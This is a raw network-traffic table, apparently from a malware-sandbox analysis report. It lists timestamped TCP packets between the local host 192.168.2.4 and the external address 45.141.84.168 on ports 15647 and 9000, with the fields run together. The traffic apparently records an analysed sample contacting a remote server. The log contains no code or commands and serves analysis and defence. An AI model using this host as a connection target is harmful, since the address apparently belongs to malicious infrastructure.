                                          Nov 28, 2024 13:39:29.345247030 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:29.345328093 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:29.346050978 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:29.391123056 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:29.427407026 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:29.427519083 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:29.506711960 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:29.546741009 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:29.546813965 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:29.548032045 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:29.628664970 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:29.666906118 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:29.667038918 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:29.749236107 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:29.786988974 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:29.787055969 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:29.868170977 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:29.868264914 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:29.907150030 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:29.977480888 CET90004975045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:29.977643013 CET90004975045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:29.977726936 CET497509000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:29.978442907 CET497509000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:29.988219023 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:29.988681078 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:30.031629086 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:30.064543009 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:30.098591089 CET90004975045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:30.101530075 CET497529000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:30.108442068 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:30.156600952 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:30.184503078 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:30.189954042 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:30.221412897 CET90004975245.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:30.221518040 CET497529000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:30.221647024 CET497529000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:30.234728098 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:30.262301922 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:30.341741085 CET90004975245.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:30.352138996 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:30.406600952 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:30.422691107 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:30.422852039 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:30.543715000 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:30.543894053 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:30.553205013 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:30.594235897 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:30.706703901 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:30.706779003 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:30.745024920 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:30.797223091 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:30.826965094 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:30.827012062 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:30.867671013 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:30.922210932 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:30.949090004 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:30.949136019 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:31.029468060 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:31.071027994 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:31.073831081 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:31.148900986 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:31.149760962 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:31.194659948 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:31.269885063 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:31.271869898 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:31.271972895 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:31.396262884 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:31.396354914 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:31.562690973 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:31.562868118 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:31.593219995 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:31.593415022 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:31.624775887 CET90004975245.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:31.624990940 CET90004975245.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:31.625008106 CET497529000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:31.625040054 CET497529000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:31.682976007 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:31.713902950 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:31.713999987 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:31.717948914 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:31.735614061 CET497539000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:31.744951010 CET90004975245.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:31.766036034 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:31.813174963 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:31.813252926 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:31.855635881 CET90004975345.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:31.855823040 CET497539000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:31.857022047 CET497539000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:31.882658958 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:31.884229898 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:31.933337927 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:31.933739901 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:31.976969957 CET90004975345.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:32.014559031 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:32.017759085 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:32.056315899 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:32.128066063 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:32.128149033 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:32.137916088 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:32.248073101 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:32.248140097 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:32.257425070 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:32.312839031 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:32.410712004 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:32.410985947 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:32.449454069 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:32.499840021 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:32.499903917 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:32.531059027 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:32.620759964 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:32.620826960 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:32.651190996 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:32.703469038 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:32.732261896 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:32.781683922 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:32.782710075 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:32.782819986 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:32.893032074 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:32.893254995 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:32.902827024 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:33.013209105 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:33.013480902 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:33.104211092 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:33.109847069 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:33.134212971 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:33.222232103 CET90004975345.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:33.222378969 CET90004975345.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:33.222465992 CET497539000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:33.222625971 CET497539000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:33.229856968 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:33.232754946 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:33.329369068 CET497549000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:33.335721970 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:33.337754965 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:33.344786882 CET90004975345.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:33.354612112 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:33.449332952 CET90004975445.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:33.451771975 CET497549000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:33.451997042 CET497549000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:33.457705975 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:33.457788944 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:33.555810928 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:33.555907011 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:33.571866035 CET90004975445.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:33.577788115 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:33.664854050 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:33.664941072 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:33.675827026 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:33.779120922 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:33.779293060 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:33.784904957 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:33.877182007 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:33.877424955 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:33.900785923 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:33.986140966 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:33.986241102 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:33.997849941 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:34.102098942 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:34.102267027 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:34.106930971 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:34.199170113 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:34.199387074 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:34.222254992 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:34.308042049 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:34.308130026 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:34.319384098 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:34.423640966 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:34.423724890 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:34.435046911 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:34.520699024 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:34.520809889 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:34.545988083 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:34.636413097 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:34.636497021 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:34.640820026 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:34.747143030 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:34.747217894 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:34.758476973 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:34.762172937 CET90004975445.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:34.762283087 CET90004975445.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:34.762339115 CET497549000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:34.765711069 CET497549000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:34.842161894 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:34.842300892 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:34.867156982 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:34.876183033 CET497559000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:34.886677027 CET90004975445.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:34.959788084 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:34.959884882 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:34.962181091 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:34.996153116 CET90004975545.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:34.996233940 CET497559000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:34.996382952 CET497559000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:35.068378925 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:35.068459034 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:35.080212116 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:35.116347075 CET90004975545.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:35.163486004 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:35.163680077 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:35.190418959 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:35.281538010 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:35.281685114 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:35.283699989 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:35.392277956 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:35.392376900 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:35.402802944 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:35.512548923 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:35.512669086 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:35.604127884 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:35.604214907 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:35.633367062 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:35.713798046 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:35.713896036 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:35.724138021 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:35.833914042 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:35.833996058 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:35.834100962 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:35.875379086 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:35.925544024 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:35.925653934 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:35.998682022 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:36.035208941 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:36.035300970 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:36.052372932 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:36.079894066 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:36.125359058 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:36.202719927 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:36.202779055 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:36.253640890 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:36.253755093 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:36.325088978 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:36.327821016 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:36.375425100 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:36.418684959 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:36.418924093 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:36.454875946 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:36.500480890 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:36.538917065 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:36.539144993 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:36.577336073 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:36.625372887 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:36.655988932 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:36.656109095 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:36.702634096 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:36.702836990 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:36.776160955 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:36.778458118 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:36.828491926 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:36.866710901 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:36.866879940 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:36.978569984 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:36.978794098 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:36.980937004 CET90004975545.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:36.981103897 CET90004975545.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:36.981105089 CET497559000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:36.981149912 CET497559000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:36.987835884 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:37.019862890 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:37.019968987 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:37.094754934 CET497569000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:37.100970984 CET90004975545.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:37.139955044 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:37.140038967 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:37.178534031 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:37.214817047 CET90004975645.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:37.214926958 CET497569000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:37.215121984 CET497569000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:37.219101906 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:37.267930984 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:37.268129110 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:37.334970951 CET90004975645.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:37.341113091 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:37.341186047 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:37.434680939 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:37.434746027 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:37.461330891 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:37.461514950 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:37.554927111 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:37.581685066 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:37.581763983 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:37.589319944 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:37.641187906 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:37.746809006 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:37.746961117 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:37.756089926 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:37.790576935 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:37.790649891 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:37.866919041 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:37.903136969 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:37.903229952 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:37.954720974 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:38.024446964 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:38.024527073 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:38.068284035 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:38.109754086 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:38.144495964 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:38.144572020 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:38.225873947 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:38.226109982 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:38.264561892 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:38.323901892 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:38.346473932 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:38.346539021 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:38.427031994 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:38.466540098 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:38.466595888 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:38.525149107 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:38.578541994 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:38.586767912 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:38.586870909 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:38.618941069 CET90004975645.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:38.619091988 CET90004975645.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:38.619159937 CET497569000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:38.619246960 CET497569000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:38.667943954 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:38.668165922 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:38.708060026 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:38.735301018 CET497579000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:38.739178896 CET90004975645.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:38.768101931 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:38.768167973 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:38.788140059 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:38.855509043 CET90004975745.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:38.855593920 CET497579000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:38.855731010 CET497579000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:38.869019032 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:38.888483047 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:38.888555050 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:38.975913048 CET90004975745.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:38.989931107 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:38.990036011 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:39.009601116 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:39.112905025 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:39.112962961 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:39.211144924 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:39.211258888 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:39.233072996 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:39.331356049 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:39.331576109 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:39.434355021 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:39.434493065 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:39.451487064 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:39.532604933 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:39.532715082 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:39.554737091 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:39.652673006 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:39.652746916 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:39.652803898 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:39.703501940 CET4973015647192.168.2.445.141.84.168
